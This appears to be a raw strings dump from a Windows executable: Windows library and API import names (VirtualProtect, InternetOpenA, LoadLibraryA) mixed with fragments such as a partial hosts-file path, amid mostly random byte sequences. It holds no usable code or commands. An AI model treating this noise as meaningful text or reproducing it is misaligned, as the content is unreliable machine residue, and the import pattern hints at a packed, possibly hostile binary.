a "UoP(
Auto=1
:AvD1(
!A'WClose
b736Dek
B8tXLHX
bad_a2v<Dia
B&bTj&r.
**BCCxh1
b.fdf4a
B=FFX.
BfJcG #
?B?F?J?N?R?V?Z?^?b
B:% |g<5
bh%H:%M
BitBlt
:B>n9B
BONZS8_
&^bP\n
brf2w!*
bR@<@u
b'ruH&
Buff#Uppw
(b,VPA
BWideC
BWjRW4Q
c4 f	f
c9d"MA
"(C` A 
CCONOUT$K}
c-*dGpa-
C<.^E!
CKAun!Xh
ClosePrinter
 (/clr)
c*m>r[sK6l
cn/bbs
COMCTL32.dll
CPgR/S
CPPZbugHo
cripth.
'*CSh,_
c>shg(yg:
`?~CTv
CValue
CWinApp
	# D`$`
d1.0">
D3>x:B
&(d480
D7m7y7
`D8l2	
+Dbf[t
DBu.hX3
dc71cb684l2cl
D(CR^2
dd1*23
dddA=r
d\Fold
>>+DHr
d(i*B"
D~j2H"
d $$L!
@DOLEPRO
dqw_3b4-4"
{'	D R<
D#r$\0tx
DragFinish
dsL&bJ
=dTF-k
dvuklnW
)dxu2Z
e+0Ow?
e1pU4P
E4SCQD
<E`7Vyl
^(EcWl
))EE	F
*,E}|H
~ejtaJ! D
Elehmd
E,n_$L`f
EnumDisplay/
?E/PreviewPages
Er(2/^
E\SOFTWAR
ES_ROOT
euoGetM i
e>X86"l
ExitProcess
\Expl'
\E|"*Z
Ez9f9l9r9z9
f1dfBl
f1D?y_
f1r3|3v3
"f##3%
f3o^X*5
f5A'OR
f7j7w7
F+	-8+
f9]8	f
f/9F=v
f9vh.p/J
@ F@AO
faultI0nB,%7
=:FazpiW0gS
Fd2h7xfui:(
Fe$1CU
f:EP_3bE
F[_`_g
FhuWXw
{Fh@:w
F$IGQ'
?f?j?n?r?v?z?~?
FKl\3H
\\f,l` h
FL$'Wq
fmo_hy
fMt.B2
F,tv(V
f,(>(V
>Fx\?!pP
=f;*YN
]fzhWfv
<+*G|&
G)0+X)x
,G94952
ga5kdQ$
GbwOlgI`:
[	gC(^
GDI32.dll
ge58=4f
#ge[RXo%nm4i
GetProcAddress
Gh5M p
GL\7j[
GLEhPjBx(
__GLOBAL_HEAP_SELECTED
Gm.Gpu
go!+Bt
G*pk@i<
G*Rb.	]d
"gtDM5.
guo5	U
 gYjX,>|m
>H^0-:R0
	h595b64144cc{6
h6l Dlg
H6&y934
H79; )
H"eew@
H;er 8^
;HFZip
hGm?;fi
H{`iB'o
HKEY_LOC
"(>H>L>l>p>
H`M~lPPM
H:mm:ss>
<hp6#]
H)?p|Hk
[[hrQWA
HSq"=B
hTL*.DLL
HTP;c |R
?(?H?T?X?h?
Hu?15F
,[(hwsb.
hxAYT+
HXtB+<9
HxZKU>/
\HZ,$%
.<Hz0^
HZ\R4l1
:/I2wF
>IAgJ~
IaT<YS
IBck_/N
ibL4s0
IEr?	jI)E
ijr\Adv
iLgju}M
InternetOpenA
io6rd7C
#iP+"5P"
+IQS(Iq2
I_RH'1
IS8zht	@o._Y
 @ise,rp
I~%:u~ 
{Iw:=,
J.2url$
$	j=81
JAd0Y8X
japoO7notz+
j@D{Af
_jg04Ou\F483lZatm6Ir5_v
Jg*DX1B
Jh0ww!
;j`h8N
:	jHq)^
JKm>*M
^J@][N
$jn:9w
jO57OO[
J:Pu\D
'juHaYd*
\J#!V0n
j.W)uQ
JYz?r<<>>\
K(7u[Pv
(kA!Bm
KbCryptKeyCacheI
K"@d|%E"F
K;`eh %
\@KERN
KERNEL32.DLL
Kk)+Y)
;k=o=s=w
k$q(F#
	kqj0Kl
k Sourc
K$T:a*s>z(A
kUv	z`
/ kW	/
K\w0	j
k+w'-n
;#<l<-<=<]
l5vP'5
L6d6h6
L8.m~?
l9nFpRr^t
la/4.0 (
LaH),'SL
lB127.0
LBnew_n
ld?<`1
ld,&tf
+LGeH*
(`;l&I
{)lkIM
.lnkwu@S8L
LoadLibraryA
\.LPTX.
,<LP{Wp{
L ,Q\*/
lqR(~Y
l^RF8<
Lsoftw
LUk<A	
,<L<X<x<
l.yi85
lZm@v:
M0s041<1
M4s+*W^
M6icFM&
mb1	'C$
M<dSM*>
MEPr\P
.miji`iCr
MiscSt
MjC=Ia
>mN+E`;
=MODULE_
Mp6ER)i!
mP#GE`
MP~'p'S
@@> _MQ`
&m|rl_DZgL
msBgAg
Mtnt\ &Box
&%MU\U
$!M;y%
M-Yu2!
N',]:,
N43V4Tn|@
n4d"ou
nC/sE0
NDh&%X
:nE"yP
NH-6>Ym.
n`hfRg4@
 n!lwu
`.NNnk
No such.
NotSupp
nPv`~p
n!Qc^C[
#nrO-uID
 n'R.p
nt>j,5
n;@X/'b
NYgh8m0
}/o,*4
~O4n4v4
|O4Zq=4,
o!9, %8
o)APPA
o[.bpke
od$~53Z
_of_rf@j
OGt*j=
O'H|pD4Y9
o{KIY:HTTP+
ole32.dll
OLEAUT32.dll
oledlg.dll
OleRun
ol^Z|[
O.mpGp
omPoizo'F
oOl?Dt-c
opyright 19
OSK:-E
oT9dB:)
^]o"$t*j
O#tv{ 
).oub472
o"u>Vj
oVERRORB
]p-0$v)
/p3_kM
p3:$W<E
P6 wG8
?PAK_<
pA:QFj
PathMatchSpecA
p C0z%d
}pD9~,
pe4rr0}
_pg8l7hl-sm
ph0 p[
|pH3r!
)'PHea
ph*x.+
Pibly.
$PiSs{
#PL-(;=
PLH?zZ
+PnK~N
[/posi
ppsGiQIYI\Qiyi4
P%)/Q!
PRiIj#
@p.Rs{
ptfV?X
pT__LB`+
\ptx|\.
[`@PUY^
Pvi8x"C
pVN:]V	
#"pw_C
Q4\/-6
[qfI@EH
Qhhf[#
qK C*h
Q$K( L
\@QlR 
}}QQPC1
QQV|o~
qri1Free3pv5
q.(tlK
*QtRtNJ
  qui*
QV.D2q
Q --wj-
q=::Z/v
r54*YZ
r6-	J[
r8<@DHr
r&9S,PI
r,9YvQ
	r>B)Ab,f&
rdi2b."
rdR<O{
RegFlushKey
r	F=QO
rfZP:i>
Ribb\#
RichEdit Tex
R.J#;^
r: m.v1"h4
>"-Ro%	
RpnDc?THREA
rs\etc\ho
 RWH'7O
rwiqa^U
RyGtkV
RykP#q
'<\;"s
s3Kjw%
S3Y3d3p3
Saf1Dhk
SCh*OV
sctorgBn
s^%d. 
S"#E"tse
S_g	SPP
shadu007qsXK
SHELL32.dll
Sh@*h<)
shHN#x
SHLWAPI.dll
sHs @ Dc
_SIMULATE Zs
SjC+s-
sjxun9
~skQ_7
SLDX~r
s;%Mak-
SP+LYIQ
<[SQF9
s.s>@9I
sug@wu
#s|VPuT
.,$s/z 0
-t,0tRC
t1030O
T2X2hp
T*4b}B.S_*
T5`5l~@6
t 6zVhDJ8
t8lBar%'MDIFrS
"t^9(uZ
`tap	5
tC5Zrft^ 
t@c@g!
t!c/n"
tCQC}7ku.
.te_oB
!This program cannot be run in DOS mode.
Th spa
Th$s'Wed
t,ikwv
#Tj _f
_TLS: 
(tmc'>VPW
>$T@p<
TPLD0(
tplhd`y
TRD&>,
~&t#\rlP
t*SWp7=
ttp://A,
TV`\W8
^tXuX:
t[YZAv
#TZ 2m
tZH7$<
t=ZVP?P
&{ -_u
u0E0xC
U&0J(W
+u1s,J
>u8SSW(
u{/b/k@(
uc`iHQq
U.hU5R
u[Js"N-U
=u/l*97
U)l p6
um;219.23
ungpl|n
-=Upde%
*u#&PV
$	 UPVQ
UQPXY]G
UQr(pIpVPn
uR{0X@2
uRFGHt
urityP
?Us6Ex
uSdT,[	8|
USER32
USER32.dll
uvwxyz#
VC20XC00
vc521s`'
&=,VgD
([V||h
vhZF84
vI(4o 
V^iabS
v,i&h'TP
VirtualAlloc
VirtualFree
VirtualProtect
 VisUC++ RA
V[K9?	
V;<?;`l&
@|.VMD
Vndv%|
VNZ$|`
,&[vrH
v$/s:;
v[Sh$`
VSPLAY`
v\<UNI
>VUSWY
VV&K 99i
V{$ vt
VWQPW9
>:-|vy
w2@3L3X:x3
W2]WpXk/'X
`W(4fRB
w50o0y0
w]&5:S8
was about o
	+w=B+
w'Bhrb
wbPben
$Wd$^3
WFVvHe
w"F$WRk`
w_" hbe*
<WHg+$$
WININET.dll
WINSPOOL.DRV
wLVSPh
?	Wm%/
WmM4<%
#WNexE.
W|NVW8
wsgwdnI13
WTK0s(VS
}wVtGV
WwktZ%L
X`?{|}~
X2Wt/@
x( ~.}4
.x9ika
X$hO;Ib
xhSG8j
xijklm&pq
x JyO$
xlg-i"
xmlns="
xN._. 
xpdXP^Dy
XPTPSW
+Xpu1*\
'X)!RF\
XtR99fy
xVRHERV
XV)Z8JSw
@,Y=	#
~ (/Y<2
y*,51u
y@<840
ydXL@4
?*@Yf+
Yh%muR
yI}cig
_yn1Zfrtg
YP)tyYY
<:y&q?	
yR]>"*.
ythVF6{
y,t_[yx
.y-upp;
yvdN@2
y\XTPL
.< }z"
zBjP AR
_ZDWQ}
zl\N64
,ZN0Mtm<Q
Zp~d2t
<Zpe+l
 ZUrufa%\;
zuThXHN
zW'xlg
zx1*O_
;@#[ZxJu
Zz /,T